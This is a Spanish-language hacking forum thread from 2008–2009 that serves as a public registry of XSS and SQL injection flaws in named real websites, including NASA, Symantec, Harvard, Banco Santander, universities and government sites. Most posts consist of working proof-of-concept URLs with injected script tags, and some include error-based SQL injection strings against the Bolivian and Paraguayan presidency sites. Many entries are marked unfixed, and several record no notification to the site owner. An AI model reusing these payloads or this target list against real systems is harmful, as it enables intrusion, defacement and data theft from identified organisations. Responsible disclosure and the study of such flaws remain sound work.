Recopilatorio de Vulnerabilidades de XSS/SQLinjection

Iniciado por sirdarckcat, 26 Mayo 2008, 03:50 AM

0 Miembros y 1 Visitante están viendo este tema.

sirdarckcat

Post para reportar de forma pública una vulnerabilidad de XSS o SQLinjection en un sitio web que no use software distribuido (es decir, que su código no sea accesible).

En caso de que sea software distribuido se puede crear un nuevo tema describiendo la vulnerabilidad.

Solo se permite la publicación de esta información en este tema, y no se puede crear un tema individual reportando este tipo de vulnerabilidades, en caso de hacerlo este será borrado.

El formato es el siguiente (ejemplo):


Sitio web: http://www.google.com/
Descubridor: sirdarckcat
URL del aviso: http://sirdarckcat.blogspot.com/2007/10/vulns-of-google-that-where-and-are-not.html
Fecha de descubrimiento: 27 de Julio del 2007
Fecha de notificación: 27 de Julio del 2007
Fecha de publicación: 13 de Octubre del 2007
Arreglado : Si, desde el 4 de Agosto del 2007
Información adicional: http://www.google.com/gwt/mdp/x/en/detect/1?manually=true&brand=sirdackcat&model=sirdarckcat.net%3Cscript%3Ealert(document.cookie);%3C/script%3E



Es importante notar que los siguientes campos son obligatorios:
Sitio web, URL del aviso, Descubridor, Información adicional

Sinembargo Descubridor puede quedar como Anónimo.

Información adicional deberá contener la dirección de enlace al PoC o a una captura de pantalla.

En caso de que sea un enlace este deberá estar entre etiquetas [code][/code].

Además siguiendo con la política de disclosure (ver reglas), solo se aceptarán PoCs que:
CitarEn los foros públicos, la publicación de vulnerabilidades en sitios Web específicos, esta permitida, si y sólo si: ésta tiene un pagerank igual o superior a 4, fue publicada en otro lugar previamente, y el enlace se mantenga firme con lo estipulado en la sección II.A.2.b. En caso de que la vulnerabilidad sea de un software distribuido, se podrá describir la vulnerabilidad en el foro correspondiente. Sin embargo, en ese caso, esta prohibido colocar sitios Web vulnerables de terceros.
Es decir, URL del aviso debe ser una URL externa al foro, y es obligatoria (a menos que la vulnerabilidad ya haya sido arreglada).

Si no tienen un blog donde publicar estas vulnerabilidades, o les da flojera hacerlo, les recomiendo http://txt.io/ es rapido y sencillo. Pueden publicar exactamente lo que pusieron aqui en el foro, pero es importante que tengamos una fuente a donde enlazar el descubrimiento de la vulnerabilidad, para evitar problemas con los sitios web.

El código bbcode del formato es:

Citar[b]Sitio web: [/b]
[b]Descubridor: [/b]
[b]URL del aviso: [/b]
[b]Fecha de descubrimiento: [/b]
[b]Fecha de notificación: [/b]
[b]Fecha de publicación: [/b]
[b]Arreglado: [/b]
[b]Información adicional: [/b]
[code][/code]

Fuera de esto, comentarios sobre las vulnerabilidades aqui comentadas deberán estar en otro post.

Esto se deberá hacer "citando" el mensaje en cuestión en un tema nuevo.

Si el comentario es de pertinencia solo al autor del mensaje, este se deberá mandar por MP, y no en un tema nuevo, de lo contrario será borrado sin aviso.

Es todo! Gracias :)

Saludos!!

Achernar

Sitio web: www.lawebdelprgramdor.com
Descubridor: Xvan
URL del aviso:   http://www.lawebdelprogramador.com/news/mostrar_new.php?id=38&texto=Hackers&n1=496610&n2=0&n3=0&n4=0&n5=0&n6=0&n7=0&n8=0&n9=0&n0=0
Fecha de descubrimiento: 25/05/2008
Fecha de notificación: 25/05/2008
Fecha de publicación: 25/05/2008
Arreglado: creo que todavia no
Información adicional: solo hay que modificar el valor del campo "texto" por un script
http://www.lawebdelprogramador.com/news/mostrar_new.php?id=270&texto=<script>alert()</script>&n1=480872&n2=0

The X-C3LL

Sitio Web Www.ForoActivo.coM
Descubridor: Vengador de las Sombras
URL de aviso:http://argeniversohack.66ghz.com/index.php/topic,2002.msg4906/topicseen.html#msg4906
Fecha de descubrimiento: 31 de Julio de 2008
Fecha de notificación: --
Fecha de publicación: 31 de Julio de 2008
Tipo: XSS
Información Adicional:

El archivo vulnerable es el de reportar abusos (/report_abuse.forum), por lo que todos los foros son vulnerables:

http://[Foro].foroactivo.net/report_abuse.forum?page=%2F%20<script>alert(/Fl4m1ng   0ur sk1llZ/)</script>&report=1

Eazy

#3
Sitio web: www.top-central.com
Descubridor: Eazy
URL del aviso: http://eazyrlz.blogspot.com/2008/09/xss-en-wwwtop-centralcom.html
Fecha de descubrimiento: 8/7/08
Fecha de notificación: 8/7/08
Fecha de publicación: 04 de Septiembre de 2008
Arreglado: No
Respuesta: Muchas gracias por avisarla, hay creditos en el codigo fuente.
Información adicional:
"><script>alert(/xss/.source)</script>
[/url]

Eazy

Sitio web: www.nexon.net
Descubridor: Eazy
URL del aviso: http://eazyrlz.blogspot.com/2008/09/xss-en-wwwnexonnet.html
Fecha de descubrimiento: 12/09/08
Fecha de notificación: 12/09/08
Fecha de publicación: 12/09/08
Arreglado: No
Información adicional:
"><script>alert(/xss/.source)</script>
[/url]

WHK

#5
Antes que nada hay que decir que todos los administradores de estos sitios webs fueron avisados de sus multiples fallas para que pudiesen ser corregidas antes de ser expuestas, solo un webmaster respondió y fue webtaller, el resto la mayoría los reparó solo en parte. esto es para tener un poco de consiencia al momento de crear un sitio web o manetener uno de que esto de la seguridad web no es algo para tomar a la ligera, antiguamente un xss era considerado de bajo riesgo pero con el tiempo ya se ha considerado medio alto dependiendo del caso ya que puedes no causar nada como la obtensión de privilegios de administración en los mismos sitios.

Ninguna web fue afectada.

Descubridor: todas por WHK.

La Nasa
http://mynasa.nasa.gov/portal/site/mynasa/template.'"><h1>XSS

La Nasa nuevamente
http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param=%68%74%74%70%3A%2F%2F%77%77%77%2E%6A%63%63%68%61%72%72%79%2E%63%6F%6D%2F%70%72%75%65%62%61%73%2F%6E%61%73%61%2E%67%6F%76%2F%77%68%6B%2E%61%73%78

MTV
http://www.mtvla.com/news/droplets/email_story_form.jhtml?title="><h1>XSS

Defcon
https://pics.defcon.org/misc.php?action=cookies
Editas tu cookie bbsessionhash:%3Ch1%3EXSS+by+WHK%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E


Telefónica
http://195.53.169.41/jsp/CDoResult.jsp?QUERYTYPE=32&QUERYTXT=lol&QUERYLEVEL=2&SESION=a';}%3C/script%3E%3Ch1%3EXSS%20by%20WHK%3Cscript%3E%3C!–&NOMLIB=tel_chile_lib|grupo_tel_chile_lib|salaprensa_lib&QUERYSTRING=&IDIOM=&FILEINI=default_cl&SALADEPRENSA=&PAIS=CL

Foros Terra
http://foros.terra.com.mx/portada.cfm?s=F&pCat=11"><br><br><br><h1>XSS

Descargas Terra
http://descargas.terra.es/index.phtml?&action=all&id_section=1"><script>alert(1) ;</script>&search="><br><h1>XSS

Simantec (de Norton Antivirus)
http://www.symantecstore.com/dr/v2/ec_main.entry25?page= ESUpgradeRenewal&client=Symantec&sid=41185&cid=2073aaaa"><br><br><br><h1>XSS%20by%20WHK<br><br><br>

Esest (de Nod32 Antivirus)
http://www.nod32.bg/ (en el buscador de arriba poner "><h1>XSS )

Infosecurityevent
http://www.infosecurityevent.com/App/homepage.cfm?keywords=%22%3E%3Ch1%3EXSS+by+WHK%3Cbr%3E%3C%2Fh1%3E&appname=100004&moduleid=42&siteadvsearch=1&collections=1%2C2%2C3%2C4%2C5%2C6%2C9&searchtype=all&displaytype=relevance&searchmethod=basic&fuseaction=search.results&go.x=14&go.y=8

Megaupload
http://www.megaupload.com/signup/es/index.php (petición POST al valor 'email' "><h1>XSS )

Winamp
http://www.winamp.com/skins/search/?s=m&q=;"></script><script>alert(/XSS/);</script>

Imageshack
http://reg.imageshack.us/content.php?page=email&q=abuse2/><h1>XSS

Webtaller
http://www.webtaller.com/regsystem/login.php?ref=/envios/enviar_articulo.php?id="><h1>XSS

Universidad Surcolombiana (Colombia)
http://portal.usco.edu.co:8080/portal/portal/pagina.jsp?id=70"><h1>XSS%20by%20WHK<script>alert(/XSS%20by%20WHK/);</script>&index=1"><h1><br>XSS

Universidad de Chile
http://www.uchile.cl/uchile.portal?_nfpb=true&_pageLabel=not&url=42454"><h1>XSS

Pontificia Universidad Católica de Chile
http://www.uc.cl/ (donde dice "buscar personas" poner "><h1>XSS )

Universidad Iberoamericana de México
http://enlinea3.uia.mx/www/busqueda_uia.cfm?busqueda=%22%3E%3Ch1%3EXSS

Universidad de Buenos Aires UBA (Argentina)
http://www.uba.ar/comunicacion/difusion/agenda/encurso.php?dia=7&mes="><h1>XSS7&?o=2007#4106

Universidade de São Paulo USP (Brasil)
http://noticias.usp.br/acontece/obterNoticia?codntc=17246&codnucjrn=1"><h1>XSS

Universidad Harvard (Estados Unidos)
https://www.pin1.harvard.edu/pin/submit-login (en datos poner "><h1>XSS )

Sourceforge
http://sourceforge.net/search/?type_of_search=soft&words=';"/></script><h1>XSS<script>alert();</script>

Softronic
http://zonealarm-antivirus.softonic.com/?refmkt=6aaaaa"><script>alert(/XSS by WHK/);</script>

WikiWix (Buscador Wikipedia)
http://es.wikiwix.com/index.php?action="><h1>XSS<br><br>?=es&bg=es

Nintendo
http://www.nintendo-europe.com/NOE/es/ES/search/search.jsp?searchText=';}}"></script><h1>XSS<script>alert();</script>&indexName=all

Sony
http://www.sony.es/search/Search.action?applicationtype=Search&searchtype=product&site=odw_es_ES?ion=es_ES_Search&start=1&page=ProductMultiSiteSearchResult&shortcut=true&query=';</script><script>alert();</script>&locale=es_ES&brand=default&allSections=true

Meanwhile
http://meanwhile.com/?domain=hackxcrack.com"><h1><br>XSS by WHK<script>&

SPAM(1)
http://www.SPAM(1)/top/search.php (en el buscador poner "><h1>XSS )

SPAM(3) (elhacker.org)
http://elhacker.org/ (en el buscador poner "><h1>XSS )

New-Bytes.net
http://md5.new-bytes.net/encoder.php (donde dice codificar poner '"><h1>XSS )

Codebreak.tk
http://codebreak.uni.cc/tools/shellcode.php (poner </textarea><h1>XSS )

ElHacker.net
http://ns2.elhacker.net/cgi-bin/birdcast.cgi (Crear una referencia con contenido HTML incrustado)

Dimitrix
http://www.dimitrix.es/youtube/ (poner </textarea><h1>XSS )

Piojosoft
http://www.piojosoft.com/index.php?sección=programas/buscatop&pclaves=<script>alert(/XSS/)</script>

Portalhacker.net
http://www.portalhacker.net/buscar.php (metodo post a un input llamado query ""><h1>XSS " mas el valor "ok " en el valor "buscar")

DarkNet.org
http://www.darknet.org/ (metodo GET al input 's' :  ""><h1>XSS ")

BlindSec
http://www.blindsec.com/notes.php (Editar el texto escapando con un '</textarea>' y guardando)

johnny.ihackstuff
http://johnny.ihackstuff.com/index.php?searchword=';alert('XSS')// &option=com_search&Itemid=5

Las FARC
http://www.farcep.org/?node=3&op=search&date_range=E+0&search_string=%27%22%3E%3Ch1%3Etest&imageFiel
d.x=0&imageField.y='%22%3E%3Ch1%3Etest0<script>alert(/esto es un problema/);</script>


Universidad DUOC de Chile
http://mercadolaboral.duoc.cl/alerta.cfm?msg='%22%3E%3Ciframe%20src=http://xssed.com%3E

Zone-H
http://www.zone-h.org/index.php?searchword=';alert('XSS')//%20&option=com_search&Itemid=5

Banco Santander
http://www.santander.com/csgs/Satellite?accesibilidad=3&canal=CAccionistas&cid=1147087106975&empr=SA
NCorporativo&leng=es_ES&pagename=SANCorporativo/Page/SC_ContenedorBuscadorGeneral&pagina=99999999999
99999999'"><script>alert(/xss/);</script>


Anonymouse
http://anonymouse.org/cgi-bin/anon-email.cgi
POST: to=yo%40noexist.fakeeeeee&subject=<script>alert(2)</script>&text=<script>alert(1)</script>


Ejercito de Chile
http://www.ejercito.cl/busqueda/index.php
POST: PHPSESSID=478a586e7ac990faa11abde01c939ad8&texto=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pub_d esde=&pub_hasta=&contenido=0&image222.x=0&image222.y=0


Yahoo
http://es.search.yahoo.com/search?p=http%3A%2F%2Fwww.huifa.cl%2Fbuscador%2Fbuscar.php%3F%26cod_rubro
%3D%26cb%3D%26criterio%3D%3C%2Ftitle%3E%3Ch1%3E%3Cmarquee%3Emuajajajaja%3C%2Fmarquee%3E%3C%2Fh1%3E%3
Ctitle%3E&fr=yfp-t-501&ei=UTF-8&meta=vl%3D


Nota: las imagenes las retiré porque utilizaban demasiado espacio, ya las pondré nuevamente pero en miniaturas cuando estén listas.

Fuentes
http://www.jccharry.com/portada/component/content/article/51.html
http://xssed.com/archive/author=whk

Erik#

Sitio web:  www.ipsaportal.unina.it
Descubridor: Erik#
URL del aviso: http://netzeven.wordpress.com/2009/02/10/xss-en-ipsatotal-buscador/
Fecha de descubrimiento: 10.02.09
Fecha de notificación: ---
Fecha de publicación: 10.02.09
Arreglado: No
Información adicional: XSS en buscador

http://ipsaportal.unina.it/?s=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fwww.krews.es%2Fhackbyerik.png%22%3E&x=0&y=0

Krackwar ™


Sitio web:  http://www.presidencia.gob.bo
Descubridor: N1GHTSCR34M
URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html
Fecha de descubrimiento: 17.02.09
Fecha de notificación: ---
Fecha de publicación: 17.02.09
Arreglado: No
Información adicional:

http://www.presidencia.gob.bo/prensa/Noticias.asp?id=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27VIEW1%27))
WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código (asm) [Seleccionar]

mov ecx,1000
Etiqueta:
invoke printf,"No Copiare en clases"
loop Etiq

Krackwar ™



Sitio web:  http://www.presidencia.gov.py
Descubridor: N1GHTSCR34M
URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html
Fecha de descubrimiento: 17.02.09
Fecha de notificación: ---
Fecha de publicación: 17.02.09
Arreglado: No
Información adicional:

http://www.presidencia.gov.py/detalle.asp?codigo=convert(int,(@@Version))
WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código (asm) [Seleccionar]

mov ecx,1000
Etiqueta:
invoke printf,"No Copiare en clases"
loop Etiq

qwertty

Sitio web: www.fotolog.com
Descubridor: FeDeX
URL del aviso: http://txt.io/t-agZ0eHQtaW9yDwsSB3R4dExpc3QY3aYCDA
Fecha de descubrimiento: Un dia en el año 2008
Fecha de notificación: --
Fecha de publicación: 18/jul/2009
Arreglado: No :)
Información adicional: Sale todo en la URL de aviso..